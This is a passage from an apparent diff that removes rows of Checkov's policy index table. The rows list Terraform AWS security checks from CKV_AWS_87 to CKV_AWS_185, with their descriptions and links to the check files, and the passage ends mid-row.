-| 164 | CKV_AWS_87 | resource | aws_redshift_cluster | Redshift cluster should not be publicly accessible | Terraform | [RedshitClusterPubliclyAvailable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshitClusterPubliclyAvailable.py) |
-| 165 | CKV_AWS_88 | resource | aws_instance | EC2 instance should not have public IP. | Terraform | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2PublicIP.py) |
-| 166 | CKV_AWS_88 | resource | aws_launch_template | EC2 instance should not have public IP. | Terraform | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2PublicIP.py) |
-| 167 | CKV_AWS_89 | resource | aws_dms_replication_instance | DMS replication instance should not be publicly accessible | Terraform | [DMSReplicationInstancePubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSReplicationInstancePubliclyAccessible.py) |
-| 168 | CKV_AWS_90 | resource | aws_docdb_cluster_parameter_group | Ensure DocumentDB TLS is not disabled | Terraform | [DocDBTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBTLS.py) |
-| 169 | CKV_AWS_91 | resource | aws_alb | Ensure the ELBv2 (Application/Network) has access logging enabled | Terraform | [ELBv2AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBv2AccessLogs.py) |
-| 170 | CKV_AWS_91 | resource | aws_lb | Ensure the ELBv2 (Application/Network) has access logging enabled | Terraform | 
[ELBv2AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBv2AccessLogs.py) |
-| 171 | CKV_AWS_92 | resource | aws_elb | Ensure the ELB has access logging enabled | Terraform | [ELBAccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBAccessLogs.py) |
-| 172 | CKV_AWS_93 | resource | aws_s3_bucket | Ensure S3 bucket policy does not lockout all but root user. (Prevent lockouts needing root account fixes) | Terraform | [S3ProtectAgainstPolicyLockout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3ProtectAgainstPolicyLockout.py) |
-| 173 | CKV_AWS_93 | resource | aws_s3_bucket_policy | Ensure S3 bucket policy does not lockout all but root user. (Prevent lockouts needing root account fixes) | Terraform | [S3ProtectAgainstPolicyLockout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3ProtectAgainstPolicyLockout.py) |
-| 174 | CKV_AWS_94 | resource | aws_glue_data_catalog_encryption_settings | Ensure Glue Data Catalog Encryption is enabled | Terraform | [GlueDataCatalogEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueDataCatalogEncryption.py) |
-| 175 | CKV_AWS_96 | resource | aws_rds_cluster | Ensure all data stored in Aurora is securely encrypted at rest | Terraform | [AuroraEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AuroraEncryption.py) |
-| 176 | CKV_AWS_97 | resource | aws_ecs_task_definition | Ensure Encryption in transit is enabled for EFS volumes in ECS Task definitions | Terraform | [ECSTaskDefinitionEFSVolumeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSTaskDefinitionEFSVolumeEncryption.py) |
-| 177 | CKV_AWS_98 | resource | aws_sagemaker_endpoint_configuration | Ensure all data stored in the 
Sagemaker Endpoint is securely encrypted at rest | Terraform | [SagemakerEndpointConfigurationEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerEndpointConfigurationEncryption.py) |
-| 178 | CKV_AWS_99 | resource | aws_glue_security_configuration | Ensure Glue Security Configuration Encryption is enabled | Terraform | [GlueSecurityConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfiguration.py) |
-| 179 | CKV_AWS_100 | resource | aws_eks_node_group | Ensure AWS EKS node group does not have implicit SSH access from 0.0.0.0/0 | Terraform | [EKSNodeGroupRemoteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSNodeGroupRemoteAccess.py) |
-| 180 | CKV_AWS_101 | resource | aws_neptune_cluster | Ensure Neptune logging is enabled | Terraform | [NeptuneClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterLogging.py) |
-| 181 | CKV_AWS_102 | resource | aws_neptune_cluster_instance | Ensure Neptune Cluster instance is not publicly available | Terraform | [NeptuneClusterInstancePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterInstancePublic.py) |
-| 182 | CKV_AWS_103 | resource | aws_alb_listener | Ensure that load balancer is using at least TLS 1.2 | Terraform | [AppLoadBalancerTLS12.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppLoadBalancerTLS12.yaml) |
-| 183 | CKV_AWS_103 | resource | aws_lb | Ensure that load balancer is using at least TLS 1.2 | Terraform | [AppLoadBalancerTLS12.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppLoadBalancerTLS12.yaml) |
-| 184 | CKV_AWS_103 | resource | aws_lb_listener | Ensure that load balancer is using at least TLS 1.2 | 
Terraform | [AppLoadBalancerTLS12.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppLoadBalancerTLS12.yaml) |
-| 185 | CKV_AWS_104 | resource | aws_docdb_cluster_parameter_group | Ensure DocumentDB has audit logs enabled | Terraform | [DocDBAuditLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBAuditLogs.py) |
-| 186 | CKV_AWS_105 | resource | aws_redshift_parameter_group | Ensure Redshift uses SSL | Terraform | [RedShiftSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedShiftSSL.py) |
-| 187 | CKV_AWS_106 | resource | aws_ebs_encryption_by_default | Ensure EBS default encryption is enabled | Terraform | [EBSDefaultEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSDefaultEncryption.py) |
-| 188 | CKV_AWS_107 | data | aws_iam_policy_document | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMCredentialsExposure.py) |
-| 189 | CKV_AWS_108 | data | aws_iam_policy_document | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMDataExfiltration.py) |
-| 190 | CKV_AWS_109 | data | aws_iam_policy_document | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMPermissionsManagement.py) |
-| 191 | CKV_AWS_110 | data | aws_iam_policy_document | Ensure IAM policies does not allow privilege escalation | Terraform | 
[IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMPrivilegeEscalation.py) |
-| 192 | CKV_AWS_111 | data | aws_iam_policy_document | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMWriteAccess.py) |
-| 193 | CKV_AWS_112 | resource | aws_ssm_document | Ensure Session Manager data is encrypted in transit | Terraform | [SSMSessionManagerDocumentEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMSessionManagerDocumentEncryption.py) |
-| 194 | CKV_AWS_113 | resource | aws_ssm_document | Ensure Session Manager logs are enabled and encrypted | Terraform | [SSMSessionManagerDocumentLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMSessionManagerDocumentLogging.py) |
-| 195 | CKV_AWS_114 | resource | aws_emr_cluster | Ensure that EMR clusters with Kerberos have Kerberos Realm set | Terraform | [EMRClusterKerberosAttributes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterKerberosAttributes.py) |
-| 196 | CKV_AWS_115 | resource | aws_lambda_function | Ensure that AWS Lambda function is configured for function-level concurrent execution limit | Terraform | [LambdaFunctionLevelConcurrentExecutionLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaFunctionLevelConcurrentExecutionLimit.py) |
-| 197 | CKV_AWS_116 | resource | aws_lambda_function | Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ) | Terraform | [LambdaDLQConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaDLQConfigured.py) |
-| 198 | CKV_AWS_117 | resource | aws_lambda_function | Ensure that AWS Lambda function is 
configured inside a VPC | Terraform | [LambdaInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaInVPC.py) |
-| 199 | CKV_AWS_118 | resource | aws_db_instance | Ensure that enhanced monitoring is enabled for Amazon RDS instances | Terraform | [RDSEnhancedMonitorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSEnhancedMonitorEnabled.py) |
-| 200 | CKV_AWS_118 | resource | aws_rds_cluster_instance | Ensure that enhanced monitoring is enabled for Amazon RDS instances | Terraform | [RDSEnhancedMonitorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSEnhancedMonitorEnabled.py) |
-| 201 | CKV_AWS_119 | resource | aws_dynamodb_table | Ensure DynamoDB Tables are encrypted using a KMS Customer Managed CMK | Terraform | [DynamoDBTablesEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamoDBTablesEncrypted.py) |
-| 202 | CKV_AWS_120 | resource | aws_api_gateway_stage | Ensure API Gateway caching is enabled | Terraform | [APIGatewayCacheEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayCacheEnable.py) |
-| 203 | CKV_AWS_121 | resource | aws_config_configuration_aggregator | Ensure AWS Config is enabled in all regions | Terraform | [ConfigConfgurationAggregatorAllRegions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ConfigConfgurationAggregatorAllRegions.py) |
-| 204 | CKV_AWS_122 | resource | aws_sagemaker_notebook_instance | Ensure that direct internet access is disabled for an Amazon SageMaker Notebook Instance | Terraform | [SageMakerInternetAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SageMakerInternetAccessDisabled.py) |
-| 205 | CKV_AWS_123 | resource | aws_vpc_endpoint_service | Ensure that VPC 
Endpoint Service is configured for Manual Acceptance | Terraform | [VPCEndpointAcceptanceConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/VPCEndpointAcceptanceConfigured.py) |
-| 206 | CKV_AWS_124 | resource | aws_cloudformation_stack | Ensure that CloudFormation stacks are sending event notifications to an SNS topic | Terraform | [CloudformationStackNotificationArns.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudformationStackNotificationArns.py) |
-| 207 | CKV_AWS_126 | resource | aws_instance | Ensure that detailed monitoring is enabled for EC2 instances | Terraform | [EC2DetailedMonitoringEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2DetailedMonitoringEnabled.py) |
-| 208 | CKV_AWS_127 | resource | aws_elb | Ensure that Elastic Load Balancer(s) uses SSL certificates provided by AWS Certificate Manager | Terraform | [ELBUsesSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBUsesSSL.py) |
-| 209 | CKV_AWS_129 | resource | aws_db_instance | Ensure that respective logs of Amazon Relational Database Service (Amazon RDS) are enabled | Terraform | [DBInstanceLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceLogging.py) |
-| 210 | CKV_AWS_130 | resource | aws_subnet | Ensure VPC subnets do not assign public IP by default | Terraform | [SubnetPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SubnetPublicIP.py) |
-| 211 | CKV_AWS_131 | resource | aws_alb | Ensure that ALB drops HTTP headers | Terraform | [ALBDropHttpHeaders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDropHttpHeaders.py) |
-| 212 | CKV_AWS_131 | resource | aws_lb | Ensure that ALB drops HTTP headers | Terraform | 
[ALBDropHttpHeaders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDropHttpHeaders.py) |
-| 213 | CKV_AWS_133 | resource | aws_db_instance | Ensure that RDS instances has backup policy | Terraform | [DBInstanceBackupRetentionPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceBackupRetentionPeriod.py) |
-| 214 | CKV_AWS_133 | resource | aws_rds_cluster | Ensure that RDS instances has backup policy | Terraform | [DBInstanceBackupRetentionPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceBackupRetentionPeriod.py) |
-| 215 | CKV_AWS_134 | resource | aws_elasticache_cluster | Ensure that Amazon ElastiCache Redis clusters have automatic backup turned on | Terraform | [ElasticCacheAutomaticBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticCacheAutomaticBackup.py) |
-| 216 | CKV_AWS_135 | resource | aws_instance | Ensure that EC2 is EBS optimized | Terraform | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2EBSOptimized.py) |
-| 217 | CKV_AWS_136 | resource | aws_ecr_repository | Ensure that ECR repositories are encrypted using KMS | Terraform | [ECRRepositoryEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRRepositoryEncrypted.py) |
-| 218 | CKV_AWS_137 | resource | aws_elasticsearch_domain | Ensure that Elasticsearch is configured inside a VPC | Terraform | [ElasticsearchInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchInVPC.py) |
-| 219 | CKV_AWS_137 | resource | aws_opensearch_domain | Ensure that Elasticsearch is configured inside a VPC | Terraform | 
[ElasticsearchInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchInVPC.py) |
-| 220 | CKV_AWS_138 | resource | aws_elb | Ensure that ELB is cross-zone-load-balancing enabled | Terraform | [ELBCrossZoneEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBCrossZoneEnable.py) |
-| 221 | CKV_AWS_139 | resource | aws_rds_cluster | Ensure that RDS clusters have deletion protection enabled | Terraform | [RDSDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSDeletionProtection.py) |
-| 222 | CKV_AWS_140 | resource | aws_rds_global_cluster | Ensure that RDS global clusters are encrypted | Terraform | [RDSClusterEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterEncrypted.py) |
-| 223 | CKV_AWS_141 | resource | aws_redshift_cluster | Ensured that Redshift cluster allowing version upgrade by default | Terraform | [RedshiftClusterAllowVersionUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterAllowVersionUpgrade.py) |
-| 224 | CKV_AWS_142 | resource | aws_redshift_cluster | Ensure that Redshift cluster is encrypted by KMS | Terraform | [RedshiftClusterKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterKMSKey.py) |
-| 225 | CKV_AWS_143 | resource | aws_s3_bucket | Ensure that S3 bucket has lock configuration enabled by default | Terraform | [S3BucketObjectLock.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BucketObjectLock.py) |
-| 226 | CKV_AWS_144 | resource | aws_s3_bucket | Ensure that S3 bucket has cross-region replication enabled | Terraform | 
[S3BucketReplicationConfiguration.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketReplicationConfiguration.yaml) |
-| 227 | CKV_AWS_144 | resource | aws_s3_bucket_replication_configuration | Ensure that S3 bucket has cross-region replication enabled | Terraform | [S3BucketReplicationConfiguration.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketReplicationConfiguration.yaml) |
-| 228 | CKV_AWS_145 | resource | aws_s3_bucket | Ensure that S3 buckets are encrypted with KMS by default | Terraform | [S3KMSEncryptedByDefault.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3KMSEncryptedByDefault.yaml) |
-| 229 | CKV_AWS_145 | resource | aws_s3_bucket_server_side_encryption_configuration | Ensure that S3 buckets are encrypted with KMS by default | Terraform | [S3KMSEncryptedByDefault.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3KMSEncryptedByDefault.yaml) |
-| 230 | CKV_AWS_146 | resource | aws_db_cluster_snapshot | Ensure that RDS database cluster snapshot is encrypted | Terraform | [RDSClusterSnapshotEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterSnapshotEncrypted.py) |
-| 231 | CKV_AWS_147 | resource | aws_codebuild_project | Ensure that CodeBuild projects are encrypted using CMK | Terraform | [CodebuildUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodebuildUsesCMK.py) |
-| 232 | CKV_AWS_148 | resource | aws_default_vpc | Ensure no default VPC is planned to be provisioned | Terraform | [VPCDefaultNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/VPCDefaultNetwork.py) |
-| 233 | CKV_AWS_149 | resource | aws_secretsmanager_secret | Ensure that Secrets Manager secret is encrypted using KMS 
CMK | Terraform | [SecretManagerSecretEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecretManagerSecretEncrypted.py) | -| 234 | CKV_AWS_150 | resource | aws_alb | Ensure that Load Balancer has deletion protection enabled | Terraform | [LBDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBDeletionProtection.py) | -| 235 | CKV_AWS_150 | resource | aws_lb | Ensure that Load Balancer has deletion protection enabled | Terraform | [LBDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBDeletionProtection.py) | -| 236 | CKV_AWS_152 | resource | aws_alb | Ensure that Load Balancer (Network/Gateway) has cross-zone load balancing enabled | Terraform | [LBCrossZone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBCrossZone.py) | -| 237 | CKV_AWS_152 | resource | aws_lb | Ensure that Load Balancer (Network/Gateway) has cross-zone load balancing enabled | Terraform | [LBCrossZone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBCrossZone.py) | -| 238 | CKV_AWS_153 | resource | aws_autoscaling_group | Autoscaling groups should supply tags to launch configurations | Terraform | [AutoScalingTagging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AutoScalingTagging.py) | -| 239 | CKV_AWS_154 | resource | aws_redshift_cluster | Ensure Redshift is not deployed outside of a VPC | Terraform | [RedshiftInEc2ClassicMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftInEc2ClassicMode.py) | -| 240 | CKV_AWS_155 | resource | aws_workspaces_workspace | Ensure that Workspace user volumes are encrypted | Terraform | 
[WorkspaceUserVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WorkspaceUserVolumeEncrypted.py) | -| 241 | CKV_AWS_156 | resource | aws_workspaces_workspace | Ensure that Workspace root volumes are encrypted | Terraform | [WorkspaceRootVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WorkspaceRootVolumeEncrypted.py) | -| 242 | CKV_AWS_157 | resource | aws_db_instance | Ensure that RDS instances have Multi-AZ enabled | Terraform | [RDSMultiAZEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSMultiAZEnabled.py) | -| 243 | CKV_AWS_158 | resource | aws_cloudwatch_log_group | Ensure that CloudWatch Log Group is encrypted by KMS | Terraform | [CloudWatchLogGroupKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchLogGroupKMSKey.py) | -| 244 | CKV_AWS_159 | resource | aws_athena_workgroup | Ensure that Athena Workgroup is encrypted | Terraform | [AthenaWorkgroupEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AthenaWorkgroupEncryption.py) | -| 245 | CKV_AWS_160 | resource | aws_timestreamwrite_database | Ensure that Timestream database is encrypted with KMS CMK | Terraform | [TimestreamDatabaseKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/TimestreamDatabaseKMSKey.py) | -| 246 | CKV_AWS_161 | resource | aws_db_instance | Ensure RDS database has IAM authentication enabled | Terraform | [RDSIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSIAMAuthentication.py) | -| 247 | CKV_AWS_162 | resource | aws_rds_cluster | Ensure RDS cluster has IAM authentication enabled | Terraform | 
[RDSClusterIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterIAMAuthentication.py) | -| 248 | CKV_AWS_163 | resource | aws_ecr_repository | Ensure ECR image scanning on push is enabled | Terraform | [ECRImageScanning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRImageScanning.py) | -| 249 | CKV_AWS_164 | resource | aws_transfer_server | Ensure Transfer Server is not exposed publicly. | Terraform | [TransferServerIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/TransferServerIsPublic.py) | -| 250 | CKV_AWS_165 | resource | aws_dynamodb_global_table | Ensure DynamoDB point in time recovery (backup) is enabled for global tables | Terraform | [DynamoDBGlobalTableRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamoDBGlobalTableRecovery.py) | -| 251 | CKV_AWS_166 | resource | aws_backup_vault | Ensure Backup Vault is encrypted at rest using KMS CMK | Terraform | [BackupVaultEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/BackupVaultEncrypted.py) | -| 252 | CKV_AWS_167 | resource | aws_glacier_vault | Ensure Glacier Vault access policy is not public by only allowing specific services or principals to access it | Terraform | [GlacierVaultAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlacierVaultAnyPrincipal.py) | -| 253 | CKV_AWS_168 | resource | aws_sqs_queue | Ensure SQS queue policy is not public by only allowing specific services or principals to access it | Terraform | [SQSQueuePolicyAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSQueuePolicyAnyPrincipal.py) | -| 254 | CKV_AWS_168 | resource | aws_sqs_queue_policy | Ensure SQS queue policy is not public by only allowing 
specific services or principals to access it | Terraform | [SQSQueuePolicyAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSQueuePolicyAnyPrincipal.py) | -| 255 | CKV_AWS_169 | resource | aws_sns_topic_policy | Ensure SNS topic policy is not public by only allowing specific services or principals to access it | Terraform | [SNSTopicPolicyAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SNSTopicPolicyAnyPrincipal.py) | -| 256 | CKV_AWS_170 | resource | aws_qldb_ledger | Ensure QLDB ledger permissions mode is set to STANDARD | Terraform | [QLDBLedgerPermissionsMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/QLDBLedgerPermissionsMode.py) | -| 257 | CKV_AWS_171 | resource | aws_emr_security_configuration | Ensure EMR Cluster security configuration encryption is using SSE-KMS | Terraform | [EMRClusterIsEncryptedKMS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterIsEncryptedKMS.py) | -| 258 | CKV_AWS_172 | resource | aws_qldb_ledger | Ensure QLDB ledger has deletion protection enabled | Terraform | [QLDBLedgerDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/QLDBLedgerDeletionProtection.py) | -| 259 | CKV_AWS_173 | resource | aws_lambda_function | Check encryption settings for Lambda environmental variable | Terraform | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py) | -| 260 | CKV_AWS_174 | resource | aws_cloudfront_distribution | Verify CloudFront Distribution Viewer Certificate is using TLS v1.2 | Terraform | [CloudfrontTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontTLS12.py) | -| 261 | CKV_AWS_175 | resource | 
aws_waf_web_acl | Ensure WAF has associated rules | Terraform | [WAFHasAnyRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py) | -| 262 | CKV_AWS_175 | resource | aws_wafregional_web_acl | Ensure WAF has associated rules | Terraform | [WAFHasAnyRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py) | -| 263 | CKV_AWS_175 | resource | aws_wafv2_web_acl | Ensure WAF has associated rules | Terraform | [WAFHasAnyRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py) | -| 264 | CKV_AWS_176 | resource | aws_waf_web_acl | Ensure Logging is enabled for WAF Web Access Control Lists | Terraform | [WAFHasLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasLogs.py) | -| 265 | CKV_AWS_176 | resource | aws_wafregional_web_acl | Ensure Logging is enabled for WAF Web Access Control Lists | Terraform | [WAFHasLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasLogs.py) | -| 266 | CKV_AWS_177 | resource | aws_kinesis_video_stream | Ensure Kinesis Video Stream is encrypted by KMS using a customer managed Key (CMK) | Terraform | [KinesisVideoEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisVideoEncryptedWithCMK.py) | -| 267 | CKV_AWS_178 | resource | aws_fsx_ontap_file_system | Ensure fx ontap file system is encrypted by KMS using a customer managed Key (CMK) | Terraform | [FSXOntapFSEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/FSXOntapFSEncryptedWithCMK.py) | -| 268 | CKV_AWS_179 | resource | aws_fsx_windows_file_system | Ensure FSX Windows filesystem is encrypted by KMS using a customer managed Key (CMK) | Terraform | 
[FSXWindowsFSEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/FSXWindowsFSEncryptedWithCMK.py) | -| 269 | CKV_AWS_180 | resource | aws_imagebuilder_component | Ensure Image Builder component is encrypted by KMS using a customer managed Key (CMK) | Terraform | [ImagebuilderComponentEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ImagebuilderComponentEncryptedWithCMK.py) | -| 270 | CKV_AWS_181 | resource | aws_s3_object_copy | Ensure S3 Object Copy is encrypted by KMS using a customer managed Key (CMK) | Terraform | [S3ObjectCopyEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3ObjectCopyEncryptedWithCMK.py) | -| 271 | CKV_AWS_182 | resource | aws_docdb_cluster | Ensure DocumentDB is encrypted by KMS using a customer managed Key (CMK) | Terraform | [DocDBEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBEncryptedWithCMK.py) | -| 272 | CKV_AWS_183 | resource | aws_ebs_snapshot_copy | Ensure EBS Snapshot Copy is encrypted by KMS using a customer managed Key (CMK) | Terraform | [EBSSnapshotCopyEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSSnapshotCopyEncryptedWithCMK.py) | -| 273 | CKV_AWS_184 | resource | aws_efs_file_system | Ensure resource is encrypted by KMS using a customer managed Key (CMK) | Terraform | [EFSFileSystemEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSFileSystemEncryptedWithCMK.py) | -| 274 | CKV_AWS_185 | resource | aws_kinesis_stream | Ensure Kinesis Stream is encrypted by KMS using a customer 